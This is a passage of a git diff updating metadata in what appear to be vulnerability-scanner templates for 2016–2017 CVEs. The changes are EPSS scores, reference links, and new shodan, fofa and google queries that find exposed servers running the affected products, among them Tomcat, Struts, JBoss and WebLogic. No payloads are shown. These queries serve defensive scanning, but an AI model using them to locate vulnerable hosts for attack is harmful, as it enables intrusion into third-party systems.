cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.48963 + epss-percentile: 0.4984 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/page-layout-builder" tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 85f91a7529..bbf7656d47 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000142 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.40793 + epss-percentile: 0.41915 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: parsi-font framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 56ded7a599..9f372ca8b6 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000148 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.4505 + epss-percentile: 0.46028 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: s3-video framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 41e5a9b1cd..e2ac7a2657 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000149 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.4505 + epss-percentile: 0.46028 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: simpel-reserveren framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index c398671eff..4bdcd73d1c 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000154 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49844 + epss-percentile: 0.4984 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: whizz framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 096ee2d027..75a648142a 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000155 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.40793 + epss-percentile: 0.41915 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -27,7 +27,6 @@ info: product: wpsolr-search-engine framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 7e6ebddcfc..d98cfcbb75 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10033 cwe-id: CWE-88 epss-score: 0.97129 - epss-percentile: 0.99775 + epss-percentile: 0.99797 cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 8c3a189e04..702f68e8a6 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -28,6 +28,7 @@ info: vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 + fofa-query: icon_hash=-1074357885 tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital http: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index b08fbf231b..928b20a505 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: zabbix product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: icon_hash=892542951 + google-query: intitle:"zabbix-server" tags: cve2016,cve,zabbix,sqli,vulhub http: diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index c8b0252ad6..fed3c400cf 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -29,6 +29,8 @@ info: vendor: opsview product: opsview shodan-query: title:"Opsview" + fofa-query: title="opsview" + google-query: intitle:"opsview" tags: cve2016,cve,opsview,lfi http: diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index f9d85a4d80..1c4eb8cc3d 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: opsview product: opsview + shodan-query: http.title:"opsview" + fofa-query: title="opsview" + google-query: intitle:"opsview" tags: cve2016,cve,redirect,opsview,authenticated http: diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 5edceadde7..185382a673 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -15,13 +15,14 @@ info: - https://www.exploit-db.com/exploits/39575 - https://nvd.nist.gov/vuln/detail/CVE-2016-10924 - https://wordpress.org/plugins/ebook-download/#developers + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 - epss-score: 0.01429 - epss-percentile: 0.85146 + epss-score: 0.01089 + epss-percentile: 0.84323 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index c9d3a43858..9f95b59b3d 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -14,13 +14,14 @@ info: - https://wpvulndb.com/vulnerabilities/8609 - https://wordpress.org/plugins/mail-masta/#developers - https://nvd.nist.gov/vuln/detail/CVE-2016-10956 + - https://github.com/p0dalirius/CVE-2016-10956-mail-masta classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 - epss-score: 0.01238 - epss-percentile: 0.83962 + epss-score: 0.01123 + epss-percentile: 0.84583 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 38766f39fb..fcfe76565d 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54991 + epss-percentile: 0.54797 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 34b85f7428..8ab955c6c9 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62591 + epss-percentile: 0.64569 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -30,7 +30,6 @@ info: product: scoreme framework: wordpress tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index b90433e242..7a9eaff751 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1555 cwe-id: CWE-77 epss-score: 0.97373 - epss-percentile: 0.99898 + epss-percentile: 0.99904 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 7767adc2bf..2536246317 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -28,6 +28,7 @@ info: vendor: sap product: netweaver shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb http: diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index b3519b5695..868ea59f72 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2016,cve,struts,rce,apache http: diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index fbbabd7b21..3312c41296 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: apache product: activemq + shodan-query: cpe:"cpe:2.3:a:apache:activemq" tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 9c1dd44d28..2ebddc1154 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: fortinet product: fortios + shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2016,cve,redirect,fortinet,fortios,seclists http: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 5f4e61ccec..4c3713b555 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -20,12 +20,13 @@ info: cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00399 - epss-percentile: 0.70799 + epss-percentile: 0.73471 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve2016,cve,crlf,apache,xss http: diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 57d085ae5e..80c8c993fb 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -14,8 +14,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-5674 cwe-id: CWE-20 - epss-score: 0.95705 - epss-percentile: 0.99378 + epss-score: 0.95793 + epss-percentile: 0.99431 cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,6 @@ info: product: readynas_surveillance fofa-query: app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login" tags: cve,cve2016,nuuo,rce - variables: rand: "{{to_lower(rand_text_alpha(32))}}" diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 76c43f3f6e..31fe431833 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.68042 + epss-percentile: 0.68612 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" @@ -30,6 +30,8 @@ info: vendor: vbulletin product: vbulletin shodan-query: title:"Powered By vBulletin" + google-query: intext:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve2016,cve,vbulletin,sqli,forum,edb http: diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 016d2dad45..2728c52e37 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.96711 - epss-percentile: 0.99632 + epss-percentile: 0.99651 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 565495b0d6..0aa33cf5a9 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -22,12 +22,14 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.63488 + epss-percentile: 0.6548 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: spip product: spip + shodan-query: http.html:"spip.php?page=backend" + fofa-query: body="spip.php?page=backend" tags: cve2016,cve,xss,spip http: diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 2da0f6239e..c98637a9a2 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -14,13 +14,14 @@ info: - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt - https://www.exploit-db.com/exploits/41482/ - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - epss-score: 0.00166 - epss-percentile: 0.53225 + epss-score: 0.00117 + epss-percentile: 0.45479 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index cd9341263b..b0e95f4acb 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: dnnsoftware product: dotnetnuke + fofa-query: app="dotnetnuke" tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware http: diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 31c0a4ce81..8431418b88 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -19,12 +19,13 @@ info: cve-id: CVE-2017-1000028 cwe-id: CWE-22 epss-score: 0.97516 - epss-percentile: 0.99984 + epss-percentile: 0.99986 cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 vendor: oracle product: glassfish_server + shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" tags: cve,cve2017,oracle,glassfish,lfi,edb http: diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index cff57e655a..f3d13672d8 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -25,6 +25,7 @@ info: max-request: 1 vendor: oracle product: glassfish_server + shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" tags: cve,cve2017,glassfish,oracle,lfi http: diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index d81d35df5f..01a9c8319c 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -15,12 +15,13 @@ info: - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 - http://www.securitytracker.com/id/1038940 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00451 - epss-percentile: 0.72424 + epss-percentile: 0.75082 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index f1070a0a21..3cec81e3c6 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle http: diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 5bdccda632..47cd2c3ca3 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -29,6 +29,8 @@ info: vendor: datataker product: dt80_dex_firmware shodan-query: http.title:"datataker" + fofa-query: title="datataker" + google-query: intitle:"datataker" tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure http: diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 08e502507c..60d4828293 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -13,20 +13,21 @@ info: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q - https://nvd.nist.gov/vuln/detail/CVE-2017-11444 + - https://github.com/d4n-sec/d4n-sec.github.io + - https://github.com/qazbnm456/awesome-cve-poc classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.018 - epss-percentile: 0.86776 + epss-percentile: 0.88111 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelliants product: subrion_cms tags: cve2017,cve,sqli,subrion,intelliants - variables: string: "{{to_lower(rand_base(5))}}" hex_string: "{{hex_encode(string)}}" diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 8b2924e2e0..ae2c4977b6 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -30,6 +30,8 @@ info: vendor: manageengine product: servicedesk shodan-query: http.title:"ManageEngine" + fofa-query: title="manageengine" + google-query: intitle:"manageengine" tags: cve,cve2017,manageengine,lfr,unauth,tenable http: diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index eeb8555f87..0fc1dd91b5 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -20,14 +20,16 @@ info: cvss-score: 8.8 cve-id: CVE-2017-11610 cwe-id: CWE-276 - epss-score: 0.97449 - epss-percentile: 0.99947 + epss-score: 0.9745 + epss-percentile: 0.9995 cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: supervisord product: supervisor shodan-query: http.title:"Supervisor Status" + fofa-query: title="supervisor status" + google-query: intitle:"supervisor status" tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord http: diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 98472b843b..c1061f11a2 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24419 + epss-percentile: 0.26054 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 58f8620d53..b9fa62b044 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-12149 cwe-id: CWE-502 epss-score: 0.9719 - epss-percentile: 0.99802 + epss-percentile: 0.9982 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: redhat product: jboss_enterprise_application_platform + shodan-query: http.title:"jboss" + fofa-query: title="jboss" + google-query: intitle:"jboss" tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat http: diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 6cc4cf375b..6f54790839 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99637 + epss-percentile: 0.99656 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 4ee30b5e16..b45f61def0 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -18,14 +18,16 @@ info: cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 - epss-score: 0.00117 - epss-percentile: 0.44712 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dokuwiki product: dokuwiki shodan-query: http.title:"DokuWiki" + fofa-query: title="dokuwiki" + google-query: intitle:"dokuwiki" tags: cve,cve2017,xss,dokuwiki http: diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index a62430eeb1..ffac334e3b 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts http: diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 208f3d300a..cf158721ed 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -29,6 +29,8 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive http: diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index ff6836350e..86993059e5 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -30,6 +30,8 @@ info: vendor: apache product: tomcat shodan-query: html:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2017,cve,tomcat,apache,rce,kev,intrusive http: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index ad974d371a..535be66581 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve2017,cve,oast,xxe,vulhub,solr,apache http: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 651e869029..53f14a8754 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: apache product: couchdb + shodan-query: product:"couchdb" tags: cve2017,cve,couchdb,apache,intrusive http: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 38169b306e..d037475149 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -28,6 +28,7 @@ info: vendor: sap product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve2017,cve,sap,lfi,java,traversal http: diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 13ca931fa2..6ab7cbf571 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -22,12 +22,13 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59827 + epss-percentile: 0.59849 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve2017,cve,xss,django,djangoproject http: diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 199cc5bec1..f4e2e467ab 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99625 + epss-percentile: 0.99643 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dreambox product: opendreambox shodan-query: title:"Dreambox WebControl" + fofa-query: title="dreambox webcontrol" + google-query: intitle:"dreambox webcontrol" tags: cve,cve2017,dreambox,rce,oast,edb http: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index e70352dcf8..a3263f8883 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - epss-percentile: 0.89847 + epss-percentile: 0.90833 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: fortinet product: fortios shodan-query: port:10443 http.favicon.hash:945408572 + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2017,cve,fortigate,xss,fortinet http: diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 20a95213bc..e4e58c7c93 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.6357 + epss-percentile: 0.65482 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 3c902736d6..807a3466db 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91577 + epss-percentile: 0.92413 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 